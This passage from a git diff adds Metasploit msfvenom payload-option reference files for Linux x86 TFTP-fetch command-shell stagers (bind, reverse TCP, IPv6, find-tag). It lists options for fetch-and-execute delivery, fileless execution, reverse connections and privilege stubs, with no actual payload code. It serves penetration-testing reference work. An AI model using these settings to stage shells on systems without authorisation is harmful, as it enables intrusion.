+FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST yes Local IP to use for serving payload +FETCH_SRVONCE true yes Stop serving the payload after it is retrieved +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LPORT 4444 yes The listen port +RHOST no The target address + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME KClQpwqp no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute a x86 payload from a TFTP server. + Spawn a command shell (staged). + + Listen for a connection (Linux x86) + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AppendExit false no Prepend a stub that will break out of a chroot (includes setreuid to root) + AutoRunScript no A script to run automatically on session creation. + AutoVerifySession true yes Automatically verify and drop invalid sessions + CommandShellCleanupCommand no A command to run before the session is closed + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableStageEncoding false no Encode the second stage payload + FetchHandlerDisable false yes Disable fetch handler + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + PrependChrootBreak false no Prepend a stub that will break out of a chroot (includes setreuid to root) + PrependFork false no Prepend a stub that starts the payload in its own process via fork + PrependSetgid false no Prepend a stub that executes the setgid(0) system call + PrependSetregid false no Prepend a stub that executes the setregid(0, 0) system call + PrependSetresgid false no Prepend a stub that executes the setresgid(0, 0, 0) system call + PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call + PrependSetreuid false no Prepend a stub that executes the setreuid(0, 0) system call + PrependSetuid false no Prepend a stub that executes the setuid(0) system call + StageEncoder no Encoder to use if EnableStageEncoding is set + StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set + StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-tftp-x86-shell-bind_tcp_uuid.txt b/msfvenom/payload_options/cmd-linux-tftp-x86-shell-bind_tcp_uuid.txt new file mode 100644 index 0000000..f730a13 --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-tftp-x86-shell-bind_tcp_uuid.txt @@ -0,0 +1,94 @@ + + Name: TFTP Fetch, Linux Command Shell, Bind TCP Stager with UUID Support (Linux x86) + Module: payload/cmd/linux/tftp/x86/shell/bind_tcp_uuid + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 111 + Rank: Normal + +Provided by: + Brendan Watters + Spencer McIntyre + skape + egypt + OJ Reeves + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST yes Local IP to use for serving payload +FETCH_SRVONCE true yes Stop serving the payload after it is retrieved +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LPORT 4444 yes The listen port +RHOST no The target address + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME XscFaQAKUsU no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute a x86 payload from a TFTP server. + Spawn a command shell (staged). + + Listen for a connection with UUID Support (Linux x86) + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AppendExit false no Prepend a stub that will break out of a chroot (includes setreuid to root) + AutoRunScript no A script to run automatically on session creation. + AutoVerifySession true yes Automatically verify and drop invalid sessions + CommandShellCleanupCommand no A command to run before the session is closed + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableStageEncoding false no Encode the second stage payload + FetchHandlerDisable false yes Disable fetch handler + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + PrependChrootBreak false no Prepend a stub that will break out of a chroot (includes setreuid to root) + PrependFork false no Prepend a stub that starts the payload in its own process via fork + PrependSetgid false no Prepend a stub that executes the setgid(0) system call + PrependSetregid false no Prepend a stub that executes the setregid(0, 0) system call + PrependSetresgid false no Prepend a stub that executes the setresgid(0, 0, 0) system call + PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call + PrependSetreuid false no Prepend a stub that executes the setreuid(0, 0) system call + PrependSetuid false no Prepend a stub that executes the setuid(0) system call + StageEncoder no Encoder to use if EnableStageEncoding is set + StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set + StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-tftp-x86-shell-find_tag.txt b/msfvenom/payload_options/cmd-linux-tftp-x86-shell-find_tag.txt new file mode 100644 index 0000000..01a6059 --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-tftp-x86-shell-find_tag.txt @@ -0,0 +1,91 @@ + + Name: TFTP Fetch, Linux Command Shell, Find Tag Stager + Module: payload/cmd/linux/tftp/x86/shell/find_tag + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 114 + Rank: Normal + +Provided by: + Brendan Watters + Spencer McIntyre + skape + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST yes Local IP to use for serving payload +FETCH_SRVONCE true yes Stop serving the payload after it is retrieved +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME WYOJTmMAFVMA no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute a x86 payload from a TFTP server. + Spawn a command shell (staged). + + Use an established connection + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AppendExit false no Prepend a stub that will break out of a chroot (includes setreuid to root) + AutoRunScript no A script to run automatically on session creation. + AutoVerifySession true yes Automatically verify and drop invalid sessions + CommandShellCleanupCommand no A command to run before the session is closed + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableStageEncoding false no Encode the second stage payload + FetchHandlerDisable false yes Disable fetch handler + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + PrependChrootBreak false no Prepend a stub that will break out of a chroot (includes setreuid to root) + PrependFork false no Prepend a stub that starts the payload in its own process via fork + PrependSetgid false no Prepend a stub that executes the setgid(0) system call + PrependSetregid false no Prepend a stub that executes the setregid(0, 0) system call + PrependSetresgid false no Prepend a stub that executes the setresgid(0, 0, 0) system call + PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call + PrependSetreuid false no Prepend a stub that executes the setreuid(0, 0) system call + PrependSetuid false no Prepend a stub that executes the setuid(0) system call + StageEncoder no Encoder to use if EnableStageEncoding is set + StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set + StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible + TAG gGSx yes The four byte tag to signify the connection. + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-tftp-x86-shell-reverse_ipv6_tcp.txt b/msfvenom/payload_options/cmd-linux-tftp-x86-shell-reverse_ipv6_tcp.txt new file mode 100644 index 0000000..6e12670 --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-tftp-x86-shell-reverse_ipv6_tcp.txt @@ -0,0 +1,101 @@ + + Name: TFTP Fetch, Linux Command Shell, Reverse TCP Stager (IPv6) + Module: payload/cmd/linux/tftp/x86/shell/reverse_ipv6_tcp + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 108 + Rank: Normal + +Provided by: + Brendan Watters + Spencer McIntyre + skape + kris katterjohn + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST no Local IP to use for serving payload +FETCH_SRVONCE true yes Stop serving the payload after it is retrieved +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LHOST yes The listen address (an interface may be specified) +LPORT 4444 yes The listen port +SCOPEID 0 no IPv6 scope ID, for link-local addresses + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME QYvDTmdcwE no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute a x86 payload from a TFTP server. + Spawn a command shell (staged). + + Connect back to attacker over IPv6 + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AppendExit false no Prepend a stub that will break out of a chroot (includes setreuid to root) + AutoRunScript no A script to run automatically on session creation. + AutoVerifySession true yes Automatically verify and drop invalid sessions + CommandShellCleanupCommand no A command to run before the session is closed + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableStageEncoding false no Encode the second stage payload + FetchHandlerDisable false yes Disable fetch handler + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + PrependChrootBreak false no Prepend a stub that will break out of a chroot (includes setreuid to root) + PrependFork false no Prepend a stub that starts the payload in its own process via fork + PrependSetgid false no Prepend a stub that executes the setgid(0) system call + PrependSetregid false no Prepend a stub that executes the setregid(0, 0) system call + PrependSetresgid false no Prepend a stub that executes the setresgid(0, 0, 0) system call + PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call + PrependSetreuid false no Prepend a stub that executes the setreuid(0, 0) system call + PrependSetuid false no Prepend a stub that executes the setuid(0) system call + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + ReverseListenerThreaded false yes Handle every connection in a new thread (experimental) + StageEncoder no Encoder to use if EnableStageEncoding is set + StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set + StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible + StagerRetryCount 10 no The number of times the stager should retry if the first connect fails + StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-tftp-x86-shell-reverse_nonx_tcp.txt b/msfvenom/payload_options/cmd-linux-tftp-x86-shell-reverse_nonx_tcp.txt new file mode 100644 index 0000000..a4994dc --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-tftp-x86-shell-reverse_nonx_tcp.txt @@ -0,0 +1,99 @@ + + Name: TFTP Fetch, Linux Command Shell, Reverse TCP Stager + Module: payload/cmd/linux/tftp/x86/shell/reverse_nonx_tcp + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 102 + Rank: Normal + +Provided by: + Brendan Watters + Spencer McIntyre + skape + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST no Local IP to use for serving payload +FETCH_SRVONCE true yes Stop serving the payload after it is retrieved +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LHOST yes The listen address (an interface may be specified) +LPORT 4444 yes The listen port + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME daKjVXOT no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute a x86 payload from a TFTP server. + Spawn a command shell (staged). + + Connect back to the attacker + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AppendExit false no Prepend a stub that will break out of a chroot (includes setreuid to root) + AutoRunScript no A script to run automatically on session creation. + AutoVerifySession true yes Automatically verify and drop invalid sessions + CommandShellCleanupCommand no A command to run before the session is closed + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableStageEncoding false no Encode the second stage payload + FetchHandlerDisable false yes Disable fetch handler + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + PrependChrootBreak false no Prepend a stub that will break out of a chroot (includes setreuid to root) + PrependFork false no Prepend a stub that starts the payload in its own process via fork + PrependSetgid false no Prepend a stub that executes the setgid(0) system call + PrependSetregid false no Prepend a stub that executes the setregid(0, 0) system call + PrependSetresgid false no Prepend a stub that executes the setresgid(0, 0, 0) system call + PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call + PrependSetreuid false no Prepend a stub that executes the setreuid(0, 0) system call + PrependSetuid false no Prepend a stub that executes the setuid(0) system call + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + ReverseListenerThreaded false yes Handle every connection in a new thread (experimental) + StageEncoder no Encoder to use if EnableStageEncoding is set + StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set + StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible + StagerRetryCount 10 no The number of times the stager should retry if the first connect fails + StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-tftp-x86-shell-reverse_tcp.txt b/msfvenom/payload_options/cmd-linux-tftp-x86-shell-reverse_tcp.txt new file mode 100644 index 0000000..a56d3e8 --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-tftp-x86-shell-reverse_tcp.txt @@ -0,0 +1,101 @@ + + Name: TFTP Fetch, Linux Command Shell, Reverse TCP Stager + Module: payload/cmd/linux/tftp/x86/shell/reverse_tcp + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 105 + Rank: Normal + +Provided by: + Brendan Watters + Spencer McIntyre + skape + egypt + tkmru + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST no Local IP to use for serving payload +FETCH_SRVONCE true yes Stop serving the payload after it is retrieved +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LHOST yes The listen address (an interface may be specified) +LPORT 4444 yes The listen port + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME rabuVYEnm no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute a x86 payload from a TFTP server. + Spawn a command shell (staged). + + Connect back to the attacker + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AppendExit false no Prepend a stub that will break out of a chroot (includes setreuid to root) + AutoRunScript no A script to run automatically on session creation. + AutoVerifySession true yes Automatically verify and drop invalid sessions + CommandShellCleanupCommand no A command to run before the session is closed + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableStageEncoding false no Encode the second stage payload + FetchHandlerDisable false yes Disable fetch handler + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + PrependChrootBreak false no Prepend a stub that will break out of a chroot (includes setreuid to root) + PrependFork false no Prepend a stub that starts the payload in its own process via fork + PrependSetgid false no Prepend a stub that executes the setgid(0) system call + PrependSetregid false no Prepend a stub that executes the setregid(0, 0) system call + PrependSetresgid false no Prepend a stub that executes the setresgid(0, 0, 0) system call + PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call + PrependSetreuid false no Prepend a stub that executes the setreuid(0, 0) system call + PrependSetuid false no Prepend a stub that executes the setuid(0) system call + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + ReverseListenerThreaded false yes Handle every connection in a new thread (experimental) + StageEncoder no Encoder to use if EnableStageEncoding is set + StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set + StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible + StagerRetryCount 10 no The number of times the stager should retry if the first connect fails + StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-tftp-x86-shell-reverse_tcp_uuid.txt b/msfvenom/payload_options/cmd-linux-tftp-x86-shell-reverse_tcp_uuid.txt new file mode 100644 index 0000000..8dfc7d9 --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-tftp-x86-shell-reverse_tcp_uuid.txt @@ -0,0 +1,101 @@ + + Name: TFTP Fetch, Linux Command Shell, Reverse TCP Stager + Module: payload/cmd/linux/tftp/x86/shell/reverse_tcp_uuid + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 111 + Rank: Normal + +Provided by: + Brendan Watters + Spencer McIntyre + skape + egypt + OJ Reeves + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST no Local IP to use for serving payload +FETCH_SRVONCE true yes Stop serving the payload after it is retrieved +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LHOST yes The listen address (an interface may be specified) +LPORT 4444 yes The listen port + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME AhCpRSioMAD no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute a x86 payload from a TFTP server. + Spawn a command shell (staged). + + Connect back to the attacker + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AppendExit false no Prepend a stub that will break out of a chroot (includes setreuid to root) + AutoRunScript no A script to run automatically on session creation. + AutoVerifySession true yes Automatically verify and drop invalid sessions + CommandShellCleanupCommand no A command to run before the session is closed + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableStageEncoding false no Encode the second stage payload + FetchHandlerDisable false yes Disable fetch handler + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + PrependChrootBreak false no Prepend a stub that will break out of a chroot (includes setreuid to root) + PrependFork false no Prepend a stub that starts the payload in its own process via fork + PrependSetgid false no Prepend a stub that executes the setgid(0) system call + PrependSetregid false no Prepend a stub that executes the setregid(0, 0) system call + PrependSetresgid false no Prepend a stub that executes the setresgid(0, 0, 0) system call + PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call + PrependSetreuid false no Prepend a stub that executes the setreuid(0, 0) system call + PrependSetuid false no Prepend a stub that executes the setuid(0) system call + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication 